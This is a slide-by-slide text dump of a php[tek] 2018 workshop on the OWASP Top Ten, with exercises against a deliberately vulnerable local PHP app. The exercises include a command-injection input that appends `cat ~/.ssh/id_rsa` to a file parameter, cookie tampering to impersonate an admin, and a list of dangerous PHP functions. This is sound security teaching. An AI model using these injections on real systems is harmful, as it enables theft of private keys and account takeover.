Tweet
Tweet

Slide 1

Slide 1 text

No content

Slide 2

Slide 2 text

No content

Slide 3

Slide 3 text

Little Bobby Tables Isn't Welcome Here php[tek] 2018 ∙ Eric Mann

Slide 4

Slide 4 text

Today's Agenda • Introductions and Setup • OWASP • ASR1 – Injection Exercise • ASR 2 – Broken Authentication Exercise • ASR 3 – Sensitive Data Exposure Exercise • ASR 4 – XML External Entities

Slide 5

Slide 5 text

Today's Agenda • ASR 5 - Broken Access Control Exercise • ASR 6 – Security Misconfiguration • ASR 7 – Cross-site Scripting Exercise • ASR 8 – Insecure Deserialization • ASR 9 – Using Components with Known Vulnerabilities • ASR 10 – Insufficient Logging & Monitoring • Responsible Disclosure

Slide 6

Slide 6 text

INTRODUCTIONS AND SETUP Getting Started

Slide 7

Slide 7 text

Introduction • Who am I? • Who are you? • What are you hoping to learn this week? • Project overview • Project requirements • PHP, SQLite, (Docker, maybe)

Slide 8

Slide 8 text

Setup • Clone the project repository git clone https://github.com/ericmann/bobby-tables.git php-owasp • Run the "smoke test" script in the repo to test your system cd php-owasp && php smoke.php cd php-owasp && ./dockphp smoke.php

Slide 9

Slide 9 text

OWASP

Slide 10

Slide 10 text

OWASP • Open Web Application Security Project • International non-profit est ~2001 • Coordinates training, guidelines, development checklists • Polls and publishes "top ten" application security risks • Updated every ~3 years • Last published in late 2018 • Results based on feedback and in-the-wild experiences surveyed from > 500 developers • Data spans info about > 100,000 real world applications • The OWASP Top Ten is not exhaustive!

Slide 11

Slide 11 text

ASR 1 - Injection

Slide 12

Slide 12 text

Injection

Slide 13

Slide 13 text

Injection Injection flaws, such as SQL, OS, and LDAP injection occur when untrusted data is sent to an interpreter as part of a command or query. The attacker's hostile data can trick the interpreter into executing unintended commands or accessing data without proper authorization. • Injected SQL • Injected CLI

Slide 14

Slide 14 text

Injection • Run the demo application php -S localhost:8888 -t asr1-injection • Visit the query interface in a browser http://localhost:8888/query • Inject yourself as a speaker into the database • Now … fix the injection attack by parameterizing your statement

Slide 15

Slide 15 text

Injection • Run the same demo application php -S localhost:8888 -t asr1-injection • Visit the files interface in a browser and download my PDF http://localhost:8888/get/?file=evolution.pdf • Use the vulnerability to "liberate" your private SSH key curl http://localhost:8888/?file=;cat ~/.ssh/id_rsa • Now … fix the injection attack by sanitizing the filename

Slide 16

Slide 16 text

ASR 2 – Broken Authentication

Slide 17

Slide 17 text

Broken Authentication Application functions related to authentication and session management are often not implemented correctly, allowing attackers to compromise passwords, keys, or session tokens, or to exploit other implementation flaws to assume other users' identities. • Authentication bypass • Unauthorized impersonation

Slide 18

Slide 18 text

Broken Authentication • Run the demo application php -S localhost:8888 -t asr2-broken-authentication • Visit the query interface in a browser http://localhost:8888/ • Log in as "reader" with the password "1234567" • Modify your cookies to impersonate "admin" • Now … fix the impersonation attack by leveraging server storage

Slide 19

Slide 19 text

ASR 3 – Sensitive Data Exposure

Slide 20

Slide 20 text

Sensitive Data Exposure Many web applications do not adequately protect sensitive data, such as credit cards, tax IDs, and authentication credentials. Attackers may steal or modify such weakly protected data to conduct credit card fraud, identity theft, or other crimes. Sensitive data deserves extra protection such as encryption at rest or in transit, as well as special precautions when exchanged with the browser. • Example: Equifax

Slide 21

Slide 21 text

Sensitive Data Exposure

Slide 22

Slide 22 text

Sensitive Data Exposure

Slide 23

Slide 23 text

Sensitive Data Exposure • Open /asr3-data-exposure in your editor • View the "encrypted" secret message text file • Modify the secret text to say something else • Now … use Libsodium to actually encrypt the text

Slide 24

Slide 24 text

ASR 4 – XML External Entities

Slide 25

Slide 25 text

XML External Entities XML eXternal Entity injection (XXE) is a type of attack against an application that parses XML input. This attack occurs when untrusted XML input containing a reference to an external entity is processed by a weakly configured XML parser. • Data exposure • Simple DOS attacks

Slide 26

Slide 26 text

XML External Entities ]> Friend of &name; &name; &name; - 2017

Slide 27

Slide 27 text

XML External Entities ]> Friend of &name; &name; &name; - 2017

Slide 28

Slide 28 text

XML External Entities - FIX loadXML($xml);

Slide 29

Slide 29 text

XML External Entities ]> &bomb;

Slide 30

Slide 30 text

ASR 5 – Broken Access Control

Slide 31

Slide 31 text

Broken Access Control Restrictions on what authenticated users are allowed to do are not properly enforced. Attackers can exploit these flaws to access unauthorized functionality and/or data, such as access other users' accounts, view sensitive files, modify other users' data, change access rights, etc. • Authentication != Authorization

Slide 32

Slide 32 text

Broken Authentication • Run the demo application php -S localhost:8888 -t asr5-broken-access • Visit the query interface in a browser http://localhost:8888/ • Log in as "bob" with the password "bobisevil" • Modify your form to target Alice's user ID (4) – change her favorite ice cream • Verify it changed – Alice's password is "aliceisnice" • Now … fix the attack by verifying user IDs match authentication

Slide 33

Slide 33 text

ASR 6 – Security Misconfiguration

Slide 34

Slide 34 text

Security Misconfiguration Good security requires having a secure configuration defined and deployed for the application, frameworks, application server, web server, database server, and platform. Secure settings should be defined, implemented, and maintained, as defaults are often insecure. Additionally, software should be kept up to date.

Slide 35

Slide 35 text

Security Misconfiguration • Server tokens • Server name • Directory traversal • SSL certificates • Remote include • allow_url_fopen • allow_url_include • Display errors • disable_functions • exec • passthru • shell_exec • system • proc_open • popen • parse_ini_file • show_source • eval • create_function

Slide 36

Slide 36 text

ASR 7 – Cross-site Scripting

Slide 37

Slide 37 text

Cross-site Scripting XSS flaws occur whenever an application takes untrusted data and sends it to a web browser without proper validation or escaping. XSS allows attackers to execute scripts in the victim's browser which can hijack user sessions, deface web sites, or redirect the user to malicious sites. • Stored • Reflected

Slide 38

Slide 38 text

Cross-site Scripting • Run the demo application php -S localhost:8888 -t asr1-injection • Visit the query interface in a browser http://localhost:8888/query • Inject malicious JavaScript by searching for: • Now … fix the injection attack by parameterizing your statement

Slide 39

Slide 39 text

ASR 8 – Insecure Deserialization

Slide 40

Slide 40 text

Insecure Deserialization Native formats usually offer more features than JSON or XML, including customizability of the serialization process. Unfortunately, the features of these native deserialization mechanisms can be repurposed for malicious effect when operating on untrusted data. • Denial of service • Access control • Remote code execution

Slide 41

Slide 41 text

Insecure Deserialization $request = file_get_contents('php://input'); $args = json_decode($request); $response = [ 'name' => $args['name'], 'email' => $args['email'] ]; echo json_encode($response);

Slide 42

Slide 42 text

ASR 9 – Using Components with Known Vulnerabilities

Slide 43

Slide 43 text

Using Components with Known Vulnerabilities

Slide 44

Slide 44 text

ASR 10 – Insufficient Logging & Monitoring

Slide 45

Slide 45 text

Insufficient Logging & Monitoring Exploitation of insufficient logging and monitoring is the bedrock of nearly every major incident. Attackers rely on the lack of monitoring and timely response to achieve their goals without being detected. • Attackers' attempts go unnoticed • Insider threats exploit access

Slide 46

Slide 46 text

Responsible Disclosure

Slide 47

Slide 47 text

Questions?

Slide 48

Slide 48 text

No content